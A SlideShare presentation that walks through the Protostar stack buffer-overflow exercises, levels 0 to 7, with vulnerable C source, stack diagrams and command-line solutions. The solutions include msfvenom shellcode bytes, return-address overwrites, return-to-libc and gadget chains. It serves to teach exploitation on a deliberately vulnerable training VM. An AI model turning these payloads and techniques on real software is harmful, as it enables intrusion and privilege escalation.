SlideShare a Scribd company logo

Exploit exercises.com stack-overflows

Download as pptx, pdf
C
commiebstrd

The buffer overflow vulnerability in Level 6 can be exploited by overwriting the return address on the stack to redirect execution flow. The return address can be overwritten with a format string pointing to shellcode stored elsewhere in memory. The shellcode executes to provide a shell, avoiding detection methods in the binary. Precise offsets must be determined through pattern creation and debugging to successfully exploit the vulnerability.

Technology
1 of 41
Downloaded 83 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
Exploit-Exercises.com Stack Overflows Spenser Reinhardt
What Is A Buffer Overflow? A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary data storage area) than it was intended to hold. Since buffers are created to contain a finite amount of data, the extra information - which has to go somewhere - can overflow into adjacent buffers, corrupting or overwriting the valid data held in them.
Tools In Use Perl – Inline perl expressions, either using $( expression ) or expression | program, depending on the need. Used to quickly GDB – GNU Debugger, allows debugging of applications, inspecting of live variables, memory, and registers. Crash dumps know as core files can also be analyzed in the same manors. Metasploit Console: In ../msf/tools Pattern_Create.rb – Creates a specialized pattern that can be used to identify how many bytes into a buffer important locations are such as EIP or variables Pattern_Offset.rb – Based on a small subset of bytes returned from overflowed buffers filled with patterns from pattern_create, this locates how far into the buffer the bytes that returned are. Venom – Creates shellcode, with the ability to change function, and encode shellcode to avoid bad characters and detection.
Preparing Protostar In virtual console window Login User: root Pass: godmode Get an IP dhclient & ifconfig | grep “inet addr”
Preparing Protostar Cont. Login ssh user@[IP] Pass: user Unlimit core dumps ulimit -c unlimited ulimit -a | grep core Change to bash shell /bin/bash Change to binary dir cd /opt/protostar/bin/
Level 0 (Source) int main(int argc, char **argv) { volatile int modified; char buffer[64]; modified = 0; gets(buffer); if(modified != 0) { printf("you have changed the 'modified' variablen"); } else { printf("Try again?n"); } }
Level 0 (Diagram) The Stack Previous Stack Frames Contains previous EIP & ESP Int modified = 0 Char buffer = 64 bytes Uninitalized stack space
Level 0 (Solution) /opt/protostar/bin$ ./stack0 test Try again? /opt/protostar/bin$ perl -e 'print "a"x68' | ./stack0 you have changed the 'modified' variable
Level 1 (source) int main(int argc, char **argv) { volatile int modified; char buffer[64]; if(argc == 1) { errx(1, "please specify an argumentn"); } modified = 0; strcpy(buffer, argv[1]); if(modified == 0x61626364) { printf("you have correctly got the variable to the right valuen"); } else { printf("Try again, you got 0x%08xn", modified); } }
Level 1 The Stack (Diagram) Previous Stack Frames Contains previous EIP & ESP Int modified = 0 Modified == 0x61626364 Char buffer = 64 bytes Uninitalized stack space
Level 1 (Solution) ./stack1 test Try again, you got 0x00000000 ./stack1 $(perl -e 'print "a"x70') Try again, you got 0x61616161 ./pattern_create.rb 70 [MSF Pattern] ./stack1 [MSF Pattern] Try again, you got 0x63413163 ./pattern_offset.rb 63413163 = 64 bytes ./stack1 $(perl -e 'print "a"x64 . "x64x63x62x61nr"') you have correctly got the variable to the right value
Level 2 (Source) int main(int argc, char **argv) { volatile int modified; char buffer[64]; char *variable; variable = getenv("GREENIE"); if(variable == NULL) { errx(1, "please set the GREENIE environment variablen"); } modified = 0; strcpy(buffer, variable); if(modified == 0x0d0a0d0a) { printf("you have correctly modified the variablen"); } else { printf("Try again, you got 0x%08xn", modified); } }
Level 2 The Stack (Diagram) Previous Stack Frames Contains previous EIP & ESP Int modified = 0 Modified == 0x0d0a0d0a Char buffer = 64 bytes Char *variable Uninitalized stack space
Level 2 (Solution) ./stack2 stack2: please set the GREENIE environment variable export GREENIE=$(perl -e 'print "a"x80') ./stack2 Try again, you got 0x61616161 ./pattern_create.rb 70 [MSF Pattern] export GREENIE=[MSF locator string] ./stack2 Try again, you got 0x63413163 ./pattern_offset.rb 63413163 = 64 bytes export GREENIE=$(perl -e 'print "a"x64 . "x0ax0dx0ax0dnr"') ./stack2 you have correctly modified the variable
Level 3 (Source) void win() { printf("code flow successfully changedn"); } int main(int argc, char **argv) { volatile int (*fp)(); char buffer[64]; fp = 0; gets(buffer); if(fp) { printf("calling function pointer, jumping to 0x%08xn", fp); fp(); } }
Level 3 The Stack (Diagram) Previous Stack Frames Contains previous EIP & ESP Int fp = 0 Must point to win() Win() = 0x08048424 Char buffer = 64 bytes void win() { printf("code flow successfully changedn"); } fp = 0; Uninitalized gets(buffer); stack space if(fp) { printf("calling function pointer, jumping to 0x%08xn", fp); fp(); } }
Level 3 (Solution) ./stack3 Test perl -e 'print "a"x80' | ./stack3 calling function pointer, jumping to 0x61616161 Segmentation fault ./pattern_create.rb 70 [MSF Pattern] ./stack3 - [MSF Pattern] calling function pointer, jumping to 0x63413163 ./pattern_offset.rb 63413163 = 64 bytes objdump -d ./stack3 | grep win 08048424 <win> perl -e 'print "a"x64 . "x24x84x04x08nr"' | ./stack3 calling function pointer, jumping to 0x08048424 code flow successfully changed
Level 4 (Source) void win() { printf("code flow successfully changedn"); } int main(int argc, char **argv) { char buffer[64]; gets(buffer); }
Level 4 The Stack (Diagram) Previous Stack Frames Contains previous EIP & ESP EIP must point to win() Win() = 0x080483f4 Char buffer = 64 bytes void win() { printf("code flow successfully changedn"); } Uninitalized fp = 0; stack space gets(buffer); if(fp) { printf("calling function pointer, jumping to 0x%08xn", fp); fp(); } }
Level 4 (Solution) ./stack4 Test perl -e 'print "a"x80' | ./stack4 Segmentation fault ./pattern_create.rb 70 [MSF Pattern] Gdb –quiet ./stack4 Run - [MSF Pattern] Program received signal SIGSEGV, Segmentation fault. 0x63413563 in ?? () ./pattern_offset.rb 63413563 = 76 bytes objdump -d ./stack4 | grep win 080483f4 <win> perl -e 'print "a"x76 . "xf4x83x04x08"' | ./stack4 code flow successfully changed Segmentation fault
Level 5 (Source) int main(int argc, char **argv) { char buffer[64]; gets(buffer); }
Level 5 The Stack (Diagram) Previous Stack Frames Contains previous EIP & ESP Overwritten with nop sled and Shellcode. Current EIP – must be overwritten to point to our shellcode EIP = 0x08048424 Char buffer = 76 bytes int main(int argc, char **argv) { Uninitalized stack space char buffer[64]; gets(buffer); }
Level 5 (Solution 1) perl -e 'print "a"x80' | ./stack5 Segmentation fault ./pattern_create.rb 80 [MSF Pattern] Gdb –-quiet ./stack5 run [MSF Pattern] Program received signal SIGSEGV, Segmentation fault. 0x63413563 in ?? () (gdb) x $esp 0xbffff7c0 ./pattern_offset.rb 63413563 = 76 bytes Location of EIP = 0xbffff760 + 76h = 0xbffff7d6
Level 5 (Solution 2) msfvenom -p linux/x86/exec -f pl -b 'x00xff' CMD=/bin/bash PrependSet resuid=true = ~70bytes perl -e 'print "a"x76 . "xc0xf7xffxbf" . "x90"x16 . "xdbxd3xd9x74x24xf4x5dxbbx62x1axd1xfex2bxc9 xb1x0bx83xedxfcx31x5dx16x03x5dx16xe2x97x70xdaxa6xce xd7xbax3exddxb4xcbx58x75x14xbfxcex85x02x10x6dxecxbc xe7x92xbcxa8xf0x54x40x29x2ex37x29x47x1fxc4xc1x97x08 x79x98x79x7bxfd"' | ./stack5 Result: Program exits cleanly without executing a shell. Reason: /bin/dash has issues with the incoming stdin from the original Program. It must check for this issue and close automatically. This Is due to the gets() function being used. More Details: StackOverflow.com
Level 5 (Solution 3) msfvenom -p linux/x86/exec -f pl -b 'xcox04x00xff' CMD='touch /tmp/touch' PrependSet resuid=true perl -e 'print "a"x76 . "xc0xf7xffxbf" . "x90"x16 . "xdaxd0xbbx78xe4x7ax44xd9x74x24xf4x58x29xc9xb1x0ex31x58x 17x83xc0x04x03x20xf7x98xb1xbaxfcx04xa3x68x65xddxfexefxe0xf ax69xc0x81x6cx6ax76x49x0fx03xe8x1cx2cx81x1cx0fxb3x26xdcx4 4xdcx53xbfxccx02xb3x4bx60x33xe4xc7x15xc6x99x4fxeax7fx0dx0 6x0bxb2x31"' | ./stack5 user@protostar:/opt/protostar/bin$ ls /tmp/ touch Local shell code for gets() - http://www.exploit-db.com/exploits/13357/
Level 6 (Source) void getpath(){ char buffer[64]; unsigned int ret; printf("input path please: "); fflush(stdout); gets(buffer); ret = __builtin_return_address(0); if((ret & 0xbf000000) == 0xbf000000) { printf("bzzzt (%p)n", ret); _exit(1); } printf("got path %sn", buffer); } int main(int argc, char **argv { getpath(); }
Level 6 The Stack (Diagram) Previous Stack Frames Current EIP Char buffer = 64 bytes Uninitalized stack space
Level 6 The Stack (Diagram 2) This address Address of SHELLCODE Address of SHELLCODE Address of FORMATSTRING Address of execl() Address of printf() Previously EIP Char buffer = 64 bytes Uninitalized stack space
Level 6 (Solution 1) ./pattern_create.rb 100 [MSF Pattern] Gdb –-quiet ./stack6 Run Input path please:[MSF Pattern] got path [MSF Pattern] Program received signal SIGSEGV, Segmentation fault. 0x37634136 in ?? () ./pattern_offset.rb 0x37634136 80 msfvenom -p linux/x86/exec -f pl -b 'xcox04x00xff' CMD='touch /tmp/touch' PrependSet resuid=true [SHELLCODE] ~ 80 bytes perl -e 'print "a"x80 . "xf0xf7xffxbf" . [SHELLCODE] | ./stack6 input path please: bzzzt (0xbffff7f0)
Level 6 (Solution 2) gdb --quiet ./stack6 (gdb) break main Breakpoint 1 at 0x8048500: file stack6/stack6.c, line 27. (gdb) run Starting program: /opt/protostar/bin/stack6 Breakpoint 1, main (argc=1, argv=0xbffff864) (gdb) print printf $1 = {<text variable, no debug info>} 0xb7eddf90 <__printf> (gdb) print execl $2 = {<text variable, no debug info>} 0xb7f2e460 <*__GI_execl> export FORMATSTRING=”%3$n” export SHELLCODE=”/location/to/shellcodefile” ~/getenvaddr FORMATSTRING ./stack6 FORMATSTRING will be at 0xbffff9a7 ~/getenvaddr SHELLCODE ./stack6 SHELLCODE will be at 0xbffff9b6
Level 6 (Solution 3) (Using altered stack6 binary) ~/stackx input path please: a 0xbffff75c got path a gdb --quiet ~/stackx (gdb) break getpath Breakpoint 1 at 0x804848a (gdb) run Starting program: /home/user/stackx Breakpoint 1, 0x0804848a in getpath () (gdb) x/4000s $esp … 0xbffff966: "/home/user/stackx" … 0xbfffffea: "/home/user/stackx"
Level 6 (Solution 4) /home/user/stackx = 17 bytes /opt/protostar/bin/stack6 = 25 bytes Difference of = 8 bytes Shows twice in mem = 16 bytes total 80 x “a” = 80 bytes 20 for other addresses = 20 bytes Starting point of = 0xbffff75c perl -e 'printf("0x%08xn", 0xbffff75c + 20 + 80 + 16)' 0Xbffff7d0
Level 6 (Solution 5) Printf = 0xB7EDDF90 Execl = 0xB7F2E460 $FORMATSTRING = 0xBFFFF9A8 $SHELLCODE = 0xBFFFF9B6 End of buffer (here) = 0XBFFFF7D0 BUFFER (80)| printf | execl | FORMATSTRING| SHELLCODE | SHELLCODE | here perl -e 'print "a"x80 . "x90xdfxedxb7" . "x60xe4xf2xb7" . "xa8xf9xffxbf" . "xb6xf9xffxbf"x2 . "xd0xf7xffxbf"' | ./stack6 Seg fault
Level 7 (Source) char *getpath(){ char buffer[64]; unsigned int ret; printf("input path please: "); fflush(stdout); gets(buffer); ret = __builtin_return_address(0); if((ret & 0xb0000000) == 0xb0000000{ printf("bzzzt (%p)n", ret); _exit(1); } printf("got path %sn", buffer); return strdup(buffer); } int main(int argc, char **argv){ getpath(); }
Level 7 (Diagram) Address of SHELLCODE Previous Stack Frames Filler buffer = 8 bytes Containsof jmp, ESP ret Address EIP & jmp, Char buffer = 80 bytes Char buffer = 80 bytes Uninitalized stack space
Level 7 (Solution 1) ./pattern_create.rb 100 [MSF Pattern] gdb –-quiet ./stack7 input path please: [MSF Pattern] Program received signal SIGSEGV, Segmentation fault. 0x37634136 in ?? () ./pattern_offset.rb 0x37634136 80
Level 7 (Solution 2) scp user@192.168.1.10:/opt/protostar/bin/stack7 ~/stack7 msfelfscan -j edx ~/stack7 [~/stack7] msfelfscan -p ~/stack7 [~/stack7] 0x08048492 pop ebx; pop ebp; ret 0x080485c7 pop edi; pop ebp; ret 0x080485f7 pop ebx; pop ebp; ret
Level 7 (Solution 3) perl -e 'print "a"x80 . "x92x84x04x08" . "c"x100' > /tmp/7-test gdb --quiet ./stack7 (gdb) run < /tmp/7-test Program received signal SIGSEGV, Segmentation fault. 0x63636363 in ?? () ./pattern_create.rb 50 [MSF Pattern] perl -e 'print "a"x80 . "x92x84x04x08" . "[MSF Pattern]”’ > /tmp/7-test gdb --quiet ./stack7 (gdb) run < /tmp/7-test Program received signal SIGSEGV, Segmentation fault. 0x33614132 in ?? ()
Level 7 (Solution 4) ./pattern_offset.rb 0x33614132 8 perl -e 'print "a"x80 . "x92x84x04x08" . "C"x8 . "D"x4' > /tmp/7-test gdb --quiet ./stack7 (gdb) run < /tmp/7-test Starting program: /opt/protostar/bin/stack7 < /tmp/7-test Program received signal SIGSEGV, Segmentation fault. 0x44444444 in ?? () msfvenom -p linux/x86/exec -f pl -b 'xcox04x00xff' CMD='touch /tmp/touch' PrependSet resuid=true [MSF Shellcode] export SHELLCODE=`perl -e 'print “[MSF Shellcode]"'` ~/getenvaddr SHELLCODE ./stack7 SHELLCODE will be at 0xbffff960
Level 7 (Solution 4) perl -e 'print "a"x80 . "x92x84x04x08" . "C"x8 . "x60xf9xffxbf"' | ./stack7 input path please: got path aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a��aaaaaaaaaaaa��CCCCCCCC`��� ls /tmp/ touch
Questions? Thanks! Exploit-exercises.com – Virtual machine creators Mattandreko.com - Tutorials Hacking: The Art of Exploitation – Jon Erickson

More Related Content

What's hot (20)

PDF
MeCC: Memory Comparison-based Code Clone Detector
영범 정
 
PDF
Beauty and the beast - Haskell on JVM
Jarek Ratajski
 
PDF
Javascript Uncommon Programming
jeffz
 
PDF
Коварный code type ITGM #9
Andrey Zakharevich
 
PDF
The Evolution of Async-Programming (SD 2.0, JavaScript)
jeffz
 
PDF
개발 과정 최적화 하기 내부툴로 더욱 강력한 개발하기 Stephen kennedy _(11시40분_103호)
changehee lee
 
PPTX
Lecture05 operator overloading-and_exception_handling
Hariz Mustafa
 
PPT
What's New in C++ 11?
Sasha Goldshtein
 
PDF
C++ idioms by example (Nov 2008)
Olve Maudal
 
PDF
Drizzles Approach To Improving Performance Of The Server
PerconaPerformance
 
PDF
ITGM #9 - Коварный CodeType, или от segfault'а к работающему коду
delimitry
 
PDF
Apache PIG - User Defined Functions
Christoph Bauer
 
PDF
The Evolution of Async-Programming on .NET Platform (TUP, Full)
jeffz
 
PDF
Eta
Jarek Ratajski
 
PDF
C++11 talk
vpoliboyina
 
PDF
Python decorators (中文)
Yiwei Chen
 
PDF
ROP 輕鬆談
hackstuff
 
PDF
Scale17x buffer overflows
johseg
 
PDF
深入淺出C語言
Simen Li
 
PDF
Bridge TensorFlow to run on Intel nGraph backends (v0.4)
Mr. Vengineer
 
MeCC: Memory Comparison-based Code Clone Detector
영범 정
 
Beauty and the beast - Haskell on JVM
Jarek Ratajski
 
Javascript Uncommon Programming
jeffz
 
Коварный code type ITGM #9
Andrey Zakharevich
 
The Evolution of Async-Programming (SD 2.0, JavaScript)
jeffz
 
개발 과정 최적화 하기 내부툴로 더욱 강력한 개발하기 Stephen kennedy _(11시40분_103호)
changehee lee
 
Lecture05 operator overloading-and_exception_handling
Hariz Mustafa
 
What's New in C++ 11?
Sasha Goldshtein
 
C++ idioms by example (Nov 2008)
Olve Maudal
 
Drizzles Approach To Improving Performance Of The Server
PerconaPerformance
 
ITGM #9 - Коварный CodeType, или от segfault'а к работающему коду
delimitry
 
Apache PIG - User Defined Functions
Christoph Bauer
 
The Evolution of Async-Programming on .NET Platform (TUP, Full)
jeffz
 
Eta
Jarek Ratajski
 
C++11 talk
vpoliboyina
 
Python decorators (中文)
Yiwei Chen
 
ROP 輕鬆談
hackstuff
 
Scale17x buffer overflows
johseg
 
深入淺出C語言
Simen Li
 
Bridge TensorFlow to run on Intel nGraph backends (v0.4)
Mr. Vengineer
 

Similar to Exploit exercises.com stack-overflows (20)

PDF
Exploitation
Security B-Sides
 
PDF
Buffer Overflows 101: Some Assembly Required
Kory Kyzar
 
ODP
Emo-Exploitation
w0nd
 
PDF
Exploitation Crash Course
UTD Computer Security Group
 
ODP
Exploiting Memory Overflows
Ankur Tyagi
 
PDF
Fuzzing - Part 1
UTD Computer Security Group
 
PPTX
Software to the slaughter
Quinn Wilton
 
PDF
C言語静的解析ツールと Ruby 1.9 trunk
ikegami__
 
PPTX
Introduction to Linux Exploit Development
johndegruyter
 
PPTX
Buffer Overflow Demo by Saurabh Sharma
n|u - The Open Security Community
 
PDF
Virtual machine and javascript engine
Duoyi Wu
 
PDF
The Stack and Buffer Overflows
UTD Computer Security Group
 
ODP
Exploiting buffer overflows
Paul Dutot IEng MIET MBCS CITP OSCP CSTM
 
PDF
2 buffer overflows
Karthic Rao
 
PDF
Presentation buffer overflow attacks and theircountermeasures
tharindunew
 
PDF
AllBits presentation - Lower Level SW Security
AllBits BVBA (freelancer)
 
PDF
StackOverflow
Susam Pal
 
PDF
CNIT 127 Ch Ch 1: Before you Begin
Sam Bowne
 
PDF
CNIT 127 Ch 1: Before you Begin
Sam Bowne
 
PPT
Buffer OverFlow
Rambabu Duddukuri
 
Exploitation
Security B-Sides
 
Buffer Overflows 101: Some Assembly Required
Kory Kyzar
 
Emo-Exploitation
w0nd
 
Exploitation Crash Course
UTD Computer Security Group
 
Exploiting Memory Overflows
Ankur Tyagi
 
Fuzzing - Part 1
UTD Computer Security Group
 
Software to the slaughter
Quinn Wilton
 
C言語静的解析ツールと Ruby 1.9 trunk
ikegami__
 
Introduction to Linux Exploit Development
johndegruyter
 
Buffer Overflow Demo by Saurabh Sharma
n|u - The Open Security Community
 
Virtual machine and javascript engine
Duoyi Wu
 
The Stack and Buffer Overflows
UTD Computer Security Group
 
Exploiting buffer overflows
Paul Dutot IEng MIET MBCS CITP OSCP CSTM
 
2 buffer overflows
Karthic Rao
 
Presentation buffer overflow attacks and theircountermeasures
tharindunew
 
AllBits presentation - Lower Level SW Security
AllBits BVBA (freelancer)
 
StackOverflow
Susam Pal
 
CNIT 127 Ch Ch 1: Before you Begin
Sam Bowne
 
CNIT 127 Ch 1: Before you Begin
Sam Bowne
 
Buffer OverFlow
Rambabu Duddukuri
 
Ad

Recently uploaded (20)

PDF
Automating the Geo-Referencing of Historic Aerial Photography in Flanders
Safe Software
 
PDF
DoS Attack vs DDoS Attack_ The Silent Wars of the Internet.pdf
CyberPro Magazine
 
PDF
5 Things to Consider When Deploying AI in Your Enterprise
Safe Software
 
PDF
Optimizing the trajectory of a wheel loader working in short loading cycles
Reno Filla
 
PPTX
The birth and death of Stars - earth and life science
rizellemarieastrolo
 
PDF
ArcGIS Utility Network Migration - The Hunter Water Story
Safe Software
 
PDF
Understanding The True Cost of DynamoDB Webinar
ScyllaDB
 
PDF
“Scaling i.MX Applications Processors’ Native Edge AI with Discrete AI Accele...
Edge AI and Vision Alliance
 
PDF
How to Comply With Saudi Arabia’s National Cybersecurity Regulations.pdf
Bluechip Advanced Technologies
 
PPSX
Usergroup - OutSystems Architecture.ppsx
Kurt Vandevelde
 
PDF
Redefining Work in the Age of AI - What to expect? How to prepare? Why it mat...
Malinda Kapuruge
 
PDF
Darley - FIRST Copenhagen Lightning Talk (2025-06-26) Epochalypse 2038 - Time...
treyka
 
PDF
GDG Cloud Southlake #44: Eyal Bukchin: Tightening the Kubernetes Feedback Loo...
James Anderson
 
PPTX
01_Approach Cyber- DORA Incident Management.pptx
FinTech Belgium
 
PDF
Java 25 and Beyond - A Roadmap of Innovations
Ana-Maria Mihalceanu
 
PDF
99 Bottles of Trust on the Wall — Operational Principles for Trust in Cyber C...
treyka
 
PDF
Bridging CAD, IBM TRIRIGA & GIS with FME: The Portland Public Schools Case
Safe Software
 
PDF
Quantum AI Discoveries: Fractal Patterns Consciousness and Cyclical Universes
Saikat Basu
 
DOCX
Daily Lesson Log MATATAG ICT TEchnology 8
LOIDAALMAZAN3
 
PDF
My Journey from CAD to BIM: A True Underdog Story
Safe Software
 
Automating the Geo-Referencing of Historic Aerial Photography in Flanders
Safe Software
 
DoS Attack vs DDoS Attack_ The Silent Wars of the Internet.pdf
CyberPro Magazine
 
5 Things to Consider When Deploying AI in Your Enterprise
Safe Software
 
Optimizing the trajectory of a wheel loader working in short loading cycles
Reno Filla
 
The birth and death of Stars - earth and life science
rizellemarieastrolo
 
ArcGIS Utility Network Migration - The Hunter Water Story
Safe Software
 
Understanding The True Cost of DynamoDB Webinar
ScyllaDB
 
“Scaling i.MX Applications Processors’ Native Edge AI with Discrete AI Accele...
Edge AI and Vision Alliance
 
How to Comply With Saudi Arabia’s National Cybersecurity Regulations.pdf
Bluechip Advanced Technologies
 
Usergroup - OutSystems Architecture.ppsx
Kurt Vandevelde
 
Redefining Work in the Age of AI - What to expect? How to prepare? Why it mat...
Malinda Kapuruge
 
Darley - FIRST Copenhagen Lightning Talk (2025-06-26) Epochalypse 2038 - Time...
treyka
 
GDG Cloud Southlake #44: Eyal Bukchin: Tightening the Kubernetes Feedback Loo...
James Anderson
 
01_Approach Cyber- DORA Incident Management.pptx
FinTech Belgium
 
Java 25 and Beyond - A Roadmap of Innovations
Ana-Maria Mihalceanu
 
99 Bottles of Trust on the Wall — Operational Principles for Trust in Cyber C...
treyka
 
Bridging CAD, IBM TRIRIGA & GIS with FME: The Portland Public Schools Case
Safe Software
 
Quantum AI Discoveries: Fractal Patterns Consciousness and Cyclical Universes
Saikat Basu
 
Daily Lesson Log MATATAG ICT TEchnology 8
LOIDAALMAZAN3
 
My Journey from CAD to BIM: A True Underdog Story
Safe Software
 
Ad

Exploit exercises.com stack-overflows

  • 1. Exploit-Exercises.com Stack Overflows Spenser Reinhardt
  • 2. What Is A Buffer Overflow? A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary data storage area) than it was intended to hold. Since buffers are created to contain a finite amount of data, the extra information - which has to go somewhere - can overflow into adjacent buffers, corrupting or overwriting the valid data held in them.
  • 3. Tools In Use Perl – Inline perl expressions, either using $( expression ) or expression | program, depending on the need. Used to quickly GDB – GNU Debugger, allows debugging of applications, inspecting of live variables, memory, and registers. Crash dumps know as core files can also be analyzed in the same manors. Metasploit Console: In ../msf/tools Pattern_Create.rb – Creates a specialized pattern that can be used to identify how many bytes into a buffer important locations are such as EIP or variables Pattern_Offset.rb – Based on a small subset of bytes returned from overflowed buffers filled with patterns from pattern_create, this locates how far into the buffer the bytes that returned are. Venom – Creates shellcode, with the ability to change function, and encode shellcode to avoid bad characters and detection.
  • 4. Preparing Protostar In virtual console window Login User: root Pass: godmode Get an IP dhclient & ifconfig | grep “inet addr”
  • 5. Preparing Protostar Cont. Login ssh user@[IP] Pass: user Unlimit core dumps ulimit -c unlimited ulimit -a | grep core Change to bash shell /bin/bash Change to binary dir cd /opt/protostar/bin/
  • 6. Level 0 (Source) int main(int argc, char **argv) { volatile int modified; char buffer[64]; modified = 0; gets(buffer); if(modified != 0) { printf("you have changed the 'modified' variablen"); } else { printf("Try again?n"); } }
  • 7. Level 0 (Diagram) The Stack Previous Stack Frames Contains previous EIP & ESP Int modified = 0 Char buffer = 64 bytes Uninitalized stack space
  • 8. Level 0 (Solution) /opt/protostar/bin$ ./stack0 test Try again? /opt/protostar/bin$ perl -e 'print "a"x68' | ./stack0 you have changed the 'modified' variable
  • 9. Level 1 (source) int main(int argc, char **argv) { volatile int modified; char buffer[64]; if(argc == 1) { errx(1, "please specify an argumentn"); } modified = 0; strcpy(buffer, argv[1]); if(modified == 0x61626364) { printf("you have correctly got the variable to the right valuen"); } else { printf("Try again, you got 0x%08xn", modified); } }
  • 10. Level 1 The Stack (Diagram) Previous Stack Frames Contains previous EIP & ESP Int modified = 0 Modified == 0x61626364 Char buffer = 64 bytes Uninitalized stack space
  • 11. Level 1 (Solution) ./stack1 test Try again, you got 0x00000000 ./stack1 $(perl -e 'print "a"x70') Try again, you got 0x61616161 ./pattern_create.rb 70 [MSF Pattern] ./stack1 [MSF Pattern] Try again, you got 0x63413163 ./pattern_offset.rb 63413163 = 64 bytes ./stack1 $(perl -e 'print "a"x64 . "x64x63x62x61nr"') you have correctly got the variable to the right value
  • 12. Level 2 (Source) int main(int argc, char **argv) { volatile int modified; char buffer[64]; char *variable; variable = getenv("GREENIE"); if(variable == NULL) { errx(1, "please set the GREENIE environment variablen"); } modified = 0; strcpy(buffer, variable); if(modified == 0x0d0a0d0a) { printf("you have correctly modified the variablen"); } else { printf("Try again, you got 0x%08xn", modified); } }
  • 13. Level 2 The Stack (Diagram) Previous Stack Frames Contains previous EIP & ESP Int modified = 0 Modified == 0x0d0a0d0a Char buffer = 64 bytes Char *variable Uninitalized stack space
  • 14. Level 2 (Solution) ./stack2 stack2: please set the GREENIE environment variable export GREENIE=$(perl -e 'print "a"x80') ./stack2 Try again, you got 0x61616161 ./pattern_create.rb 70 [MSF Pattern] export GREENIE=[MSF locator string] ./stack2 Try again, you got 0x63413163 ./pattern_offset.rb 63413163 = 64 bytes export GREENIE=$(perl -e 'print "a"x64 . "x0ax0dx0ax0dnr"') ./stack2 you have correctly modified the variable
  • 15. Level 3 (Source) void win() { printf("code flow successfully changedn"); } int main(int argc, char **argv) { volatile int (*fp)(); char buffer[64]; fp = 0; gets(buffer); if(fp) { printf("calling function pointer, jumping to 0x%08xn", fp); fp(); } }
  • 16. Level 3 The Stack (Diagram) Previous Stack Frames Contains previous EIP & ESP Int fp = 0 Must point to win() Win() = 0x08048424 Char buffer = 64 bytes void win() { printf("code flow successfully changedn"); } fp = 0; Uninitalized gets(buffer); stack space if(fp) { printf("calling function pointer, jumping to 0x%08xn", fp); fp(); } }
  • 17. Level 3 (Solution) ./stack3 Test perl -e 'print "a"x80' | ./stack3 calling function pointer, jumping to 0x61616161 Segmentation fault ./pattern_create.rb 70 [MSF Pattern] ./stack3 - [MSF Pattern] calling function pointer, jumping to 0x63413163 ./pattern_offset.rb 63413163 = 64 bytes objdump -d ./stack3 | grep win 08048424 <win> perl -e 'print "a"x64 . "x24x84x04x08nr"' | ./stack3 calling function pointer, jumping to 0x08048424 code flow successfully changed
  • 18. Level 4 (Source) void win() { printf("code flow successfully changedn"); } int main(int argc, char **argv) { char buffer[64]; gets(buffer); }
  • 19. Level 4 The Stack (Diagram) Previous Stack Frames Contains previous EIP & ESP EIP must point to win() Win() = 0x080483f4 Char buffer = 64 bytes void win() { printf("code flow successfully changedn"); } Uninitalized fp = 0; stack space gets(buffer); if(fp) { printf("calling function pointer, jumping to 0x%08xn", fp); fp(); } }
  • 20. Level 4 (Solution) ./stack4 Test perl -e 'print "a"x80' | ./stack4 Segmentation fault ./pattern_create.rb 70 [MSF Pattern] Gdb –quiet ./stack4 Run - [MSF Pattern] Program received signal SIGSEGV, Segmentation fault. 0x63413563 in ?? () ./pattern_offset.rb 63413563 = 76 bytes objdump -d ./stack4 | grep win 080483f4 <win> perl -e 'print "a"x76 . "xf4x83x04x08"' | ./stack4 code flow successfully changed Segmentation fault
  • 21. Level 5 (Source) int main(int argc, char **argv) { char buffer[64]; gets(buffer); }
  • 22. Level 5 The Stack (Diagram) Previous Stack Frames Contains previous EIP & ESP Overwritten with nop sled and Shellcode. Current EIP – must be overwritten to point to our shellcode EIP = 0x08048424 Char buffer = 76 bytes int main(int argc, char **argv) { Uninitalized stack space char buffer[64]; gets(buffer); }
  • 23. Level 5 (Solution 1) perl -e 'print "a"x80' | ./stack5 Segmentation fault ./pattern_create.rb 80 [MSF Pattern] Gdb –-quiet ./stack5 run [MSF Pattern] Program received signal SIGSEGV, Segmentation fault. 0x63413563 in ?? () (gdb) x $esp 0xbffff7c0 ./pattern_offset.rb 63413563 = 76 bytes Location of EIP = 0xbffff760 + 76h = 0xbffff7d6
  • 24. Level 5 (Solution 2) msfvenom -p linux/x86/exec -f pl -b 'x00xff' CMD=/bin/bash PrependSet resuid=true = ~70bytes perl -e 'print "a"x76 . "xc0xf7xffxbf" . "x90"x16 . "xdbxd3xd9x74x24xf4x5dxbbx62x1axd1xfex2bxc9 xb1x0bx83xedxfcx31x5dx16x03x5dx16xe2x97x70xdaxa6xce xd7xbax3exddxb4xcbx58x75x14xbfxcex85x02x10x6dxecxbc xe7x92xbcxa8xf0x54x40x29x2ex37x29x47x1fxc4xc1x97x08 x79x98x79x7bxfd"' | ./stack5 Result: Program exits cleanly without executing a shell. Reason: /bin/dash has issues with the incoming stdin from the original Program. It must check for this issue and close automatically. This Is due to the gets() function being used. More Details: StackOverflow.com
  • 25. Level 5 (Solution 3) msfvenom -p linux/x86/exec -f pl -b 'xcox04x00xff' CMD='touch /tmp/touch' PrependSet resuid=true perl -e 'print "a"x76 . "xc0xf7xffxbf" . "x90"x16 . "xdaxd0xbbx78xe4x7ax44xd9x74x24xf4x58x29xc9xb1x0ex31x58x 17x83xc0x04x03x20xf7x98xb1xbaxfcx04xa3x68x65xddxfexefxe0xf ax69xc0x81x6cx6ax76x49x0fx03xe8x1cx2cx81x1cx0fxb3x26xdcx4 4xdcx53xbfxccx02xb3x4bx60x33xe4xc7x15xc6x99x4fxeax7fx0dx0 6x0bxb2x31"' | ./stack5 user@protostar:/opt/protostar/bin$ ls /tmp/ touch Local shell code for gets() - http://www.exploit-db.com/exploits/13357/
  • 26. Level 6 (Source) void getpath(){ char buffer[64]; unsigned int ret; printf("input path please: "); fflush(stdout); gets(buffer); ret = __builtin_return_address(0); if((ret & 0xbf000000) == 0xbf000000) { printf("bzzzt (%p)n", ret); _exit(1); } printf("got path %sn", buffer); } int main(int argc, char **argv { getpath(); }
  • 27. Level 6 The Stack (Diagram) Previous Stack Frames Current EIP Char buffer = 64 bytes Uninitalized stack space
